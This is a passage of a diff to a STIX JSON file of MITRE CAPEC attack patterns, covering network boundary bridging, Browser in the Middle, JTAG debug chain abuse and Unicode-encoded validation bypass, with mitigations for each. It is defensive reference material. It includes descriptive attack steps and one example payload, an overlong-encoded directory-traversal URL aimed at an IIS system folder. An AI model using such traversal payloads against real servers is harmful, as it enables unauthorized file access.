", + "x_capec_extended_description": "\n Network boundary devices are network devices such as routers and firewalls which segment networks by restricting certain types of traffic from flowing through the device. Network boundary devices are often directly accessible through a portal page for management purposes. An adversary’s goal when conducting network boundary bridging is to connect networks which are being segmented by the device. To do so, the adversary must first compromise the network boundary device.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have control of a network boundary device." + ], + "x_capec_resources_required": [ + "The adversary requires either high privileges or full control of a boundary device on a target network." + ], + "x_capec_skills_required": { + "Medium": "The adversary must understand how to manage the target network device to create or edit policies which will bridge networks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure network devices are storing credentials in encrypted stores", + "id": "course-of-action--32725b6b-67e3-42a5-90c3-3df837752e22", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93781594-95f7-4a98-8d8d-c63912350df5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32725b6b-67e3-42a5-90c3-3df837752e22", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the principle of least privilege and restrict administrative duties to as few accounts as possible. Ensure these privileged accounts are secured with strong credentials which do not overlap with other network devices.", + "id": "course-of-action--038c3205-b918-4a35-84f2-e2293c5939db", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc655a9c-2a77-4423-9b9f-db489ac138b6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--038c3205-b918-4a35-84f2-e2293c5939db", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: When possible, configure network boundary devices to use MFA.", + "id": "course-of-action--6cc78d5e-6d76-4d60-bc22-2cf852698416", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--783c4799-804f-4421-8e13-a415b2f6ba48", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6cc78d5e-6d76-4d60-bc22-2cf852698416", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Change the default configuration for network devices to harden their security profiles. Default configurations are often enabled with insecure features to allow ease of installation and management. However, these configurations can be easily discovered and exploited by adversaries.", + "id": "course-of-action--4b5892a7-8b4a-451f-ae7a-1b25ce5ece40", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7780fd5c-50d4-4542-9e3f-50121cc5dbf5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b5892a7-8b4a-451f-ae7a-1b25ce5ece40", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform integrity checks on audit logs for network device management and review them to identify abnormalities in configurations.", + "id": "course-of-action--dff06017-2189-4ee8-875b-d7c722ceb8fb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dff06017-2189-4ee8-875b-d7c722ceb8fb", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Prevent network boundary devices from being physically accessed by unauthorized personnel to prevent tampering.", + "id": "course-of-action--8395680e-e9c6-4c7b-a94f-e5d4bdd9e5c0", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b91c573-2031-4024-a179-a9a719c76d8a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8395680e-e9c6-4c7b-a94f-e5d4bdd9e5c0", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits the inherent functionalities of a web browser, in order to establish an unnoticed remote desktop connection in the victim's browser to the adversary's system. The adversary must deploy a web client with a remote desktop session that the victim can access.", + "external_references": [ + { + "external_id": "CAPEC-701", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/701.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "description": "Tommasi F., Catalano, C., Taurino I., Browser-in-the-Middle (BitM) attack, 2021--04---17", + "external_id": "REF-747", + "source_name": "reference_from_CAPEC", + "url": "https://link.springer.com/article/10.1007/s10207-021-00548-5#citeas" + } + ], + "id": "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Browser in the Middle (BiTM)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify potential targets: The adversary identifies an application or service that the target is likely to use.

    2. Techniques
    The adversary stands up a server to host the transparent browser and entices victims to use it by using a domain name similar to the legitimate application. In addition to the transparent browser, the adversary could also install a web proxy, sniffer, keylogger, and other tools to assist in their goals.

Experiment

  1. Lure victims: The adversary crafts a phishing campaign to lure unsuspecting victims into using the transparent browser.

    2. Techniques
    An adversary can create a convincing email with a link to download the web client and interact with the transparent browser.

Exploit

  1. Monitor and Manipulate Data: When the victim establishes the connection to the transparent browser, the adversary can view victim activity and make alterations to what the victim sees when browsing the web.

    2. Techniques
    Once a victim has established a connection to the transparent browser, the adversary can use installed tools such as a web proxy, keylogger, or additional malicious browser extensions to gather and manipulate data or impersonate the victim.
", + "x_capec_extended_description": "\n Unlike Adversary in the Browser, the victim does not need to install a malicious application. Browser in the Middle uses the inherent functionalities of a web browser to convince the victim they are browsing normally under the assumption that the connection is secure. All the actions performed by the victim in the open window are actually performed on the machine of the adversary. These victim-authenticated sessions are available to the adversary to use. All entered data such as passwords and usernames can be logged by the adversary and the content displayed to the victim can be altered arbitrarily. Varieties of multifactor authentication which rely solely on user input and do not use a form of hardware-based secret exchange are vulnerable to browser in the middle.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must create a convincing web client to establish the connection. The victim then needs to be lured onto the adversary's webpage. In addition, the victim's machine must not use local authentication APIs, a hardware token, or a Trusted Platform Module (TPM) to authenticate." + ], + "x_capec_resources_required": [ + "A web application with a client is needed to enable the victim's browser to establish a remote desktop connection to the system of the adversary." + ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use strong, mutual authentication to fully authenticate with both ends of any communications channel", + "id": "course-of-action--f44bc993-82a0-449a-9b98-04b0c109d981", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-701-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f66607a-0817-42cb-a00b-c67a8e30b827", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f44bc993-82a0-449a-9b98-04b0c109d981", + "spec_version": "2.1", + "target_ref": "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits incorrect chaining or granularity of hardware debug components in order to gain unauthorized access to debug functionality on a chip. This happens when authorization is not checked on a per function basis and is assumed for a chain or group of debug functionality.\n ", + "external_references": [ + { + "external_id": "CAPEC-702", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/702.html" + }, + { + "external_id": "CWE-1296", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1296.html" + }, + { + "description": "Hewlett-Packard Journal, Overview of the Test Access Port, 1994--12", + "external_id": "REF-748", + "source_name": "reference_from_CAPEC", + "url": "https://www.hpl.hp.com/hpjournal/94dec/dec94a7a.pdf" + }, + { + "description": "Finding Faults with the Test Access Port (TAP), 2017--06---12", + "external_id": "REF-749", + "source_name": "reference_from_CAPEC", + "url": "https://flynn.com/2017/06/12/finding-faults-with-the-test-access-port-tap/" + }, + { + "description": "Technical Guide to JTAG", + "external_id": "REF-750", + "source_name": "reference_from_CAPEC", + "url": "https://www.xjtag.com/about-jtag/jtag-a-technical-overview/" + } + ], + "id": "attack-pattern--a8c03df8-2c83-493f-8e92-4c8afac0ed40", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Exploiting Incorrect Chaining or Granularity of Hardware Debug Components", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A System-on-Chip (SoC) might give regular users access to the SoC-level TAP, but does not want to give access to all of the internal TAPs (e.g., Core). If any of the internal TAPs were incorrectly chained to the SoC-level TAP, this would grant regular users access to the internal TAPs and allow them to execute commands there.\n ", + "\n Suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented, and the attacker can gain unauthorized access.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find and scan debug interface: The adversary must first find and scan a debug interface to determine what they are authorized to use and what devices are chained to that interface.

    2. Techniques
    Use a JTAGulator on a JTAG interface to determine the correct pin configuration, baud rate, and number of devices in the chain

Experiment

  1. Connect to debug interface: The adversary next connects a device to the JTAG interface using the properties found in the explore phase so that they can send commands. The adversary sends some test commands to make sure the connection is working.

    2. Techniques
    Connect a device such as a BusPirate or UM232H to the JTAG interface and connect using pin layout found from the JTAGulator

Exploit

  1. Move along debug chain: Once the adversary has connected to the main TAP, or JTAG interface, they will move along the TAP chain to see what debug interfaces might be available on that chain.

    2. Techniques
    Run a command such as “scan_chain” to see what TAPs are available in the chain.
", + "x_capec_extended_description": "\n Chip designers often include design elements in a chip for debugging and troubleshooting such as:\n \n Various Test Access Ports (TAPs) which allow boundary scan commands to be executed.\n Scan cells that allow the chip to be used as a \"stimulus and response\" mechanism for scanning the internal components of a chip.\n Custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs.\n \n Because devices commonly have multiple chips and debug components, designers will connect debug components and expose them through a single external interface, which is referred to as “chaining”. Logic errors during design or synthesis could misconfigure the chaining of the debug components, which could allow unintended access. TAPs are also commonly referred to as JTAG interfaces.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Hardware device has an exposed debug interface" + ], + "x_capec_resources_required": [ + "A device to scan a TAP or JTAG interface, such as a JTAGulator", + "A device to communicate on a TAP or JTAG interface, such as a BusPirate" + ], + "x_capec_skills_required": { + "Medium": "Ability to operate devices to scan and connect to an exposed debug interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Ensure that debug components are properly chained, and their granularity is maintained at different authorization levels", + "id": "course-of-action--77da5dae-701a-472d-bf4f-06b848567b8c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-702-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49194375-4e3f-4111-a459-90634fe46e45", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--77da5dae-701a-472d-bf4f-06b848567b8c", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8c03df8-2c83-493f-8e92-4c8afac0ed40", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform Post-silicon validation tests at various authorization levels to ensure that debug components are only accessible to authorized users", + "id": "course-of-action--b9d223ef-6328-4391-8c88-2d62f27c78ff", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-702-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bc54e41d-0855-4da4-a127-65b1ceae9ba3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b9d223ef-6328-4391-8c88-2d62f27c78ff", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8c03df8-2c83-493f-8e92-4c8afac0ed40", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.", + "external_references": [ + { + "external_id": "CAPEC-71", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/71.html" + }, + { + "external_id": "CWE-176", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/176.html" + }, + { + "external_id": "CWE-179", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "Unicode Encoding", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Unicode_Encoding" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Unicode Encoding to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is\n http://target.server/some_directory/../../../winnt\n In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.\n In October 2000, an adversary publicly revealed that Microsoft's IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are\n . yields C0 AE/ yields C0 AF\\ yields C1 9C\n Using this conversion, the previously displayed URL can be encoded as\n http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winntSee also: CVE-2000-0884" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe entry points to locate vulnerabilities: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various Unicode encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Try to use Unicode encoding of content in Scripts in order to bypass validation routines.
    Try to use Unicode encoding of content in HTML in order to bypass validation routines.
    Try to use Unicode encoding of content in CSS in order to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Filtering is performed on data that has not be properly canonicalized." + ], + "x_capec_skills_required": { + "Medium": "An attacker needs to understand Unicode encodings and have an idea (or be able to find out) what system components may not be Unicode aware." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.", + "id": "course-of-action--9a5363ad-5ca7-45b1-a710-9ee89914b20d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-71-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7431af74-11f2-4cf7-aa2d-aa0b07ff9256", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a5363ad-5ca7-45b1-a710-9ee89914b20d", + "spec_version": "2.1", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that filtering or input validation is applied to canonical data.", + "id": "course-of-action--3b44d922-39ec-42cc-ae93-00b251aa514e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-71-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--caeb99db-8036-444d-a785-c9ac795a3cf9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b44d922-39ec-42cc-ae93-00b251aa514e", + "spec_version": "2.1", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--25524460-3133-4541-a10d-84d3fd8a1db3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "spec_version": "2.1", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.", + "external_references": [ + { + "external_id": "CAPEC-72", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/72.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": 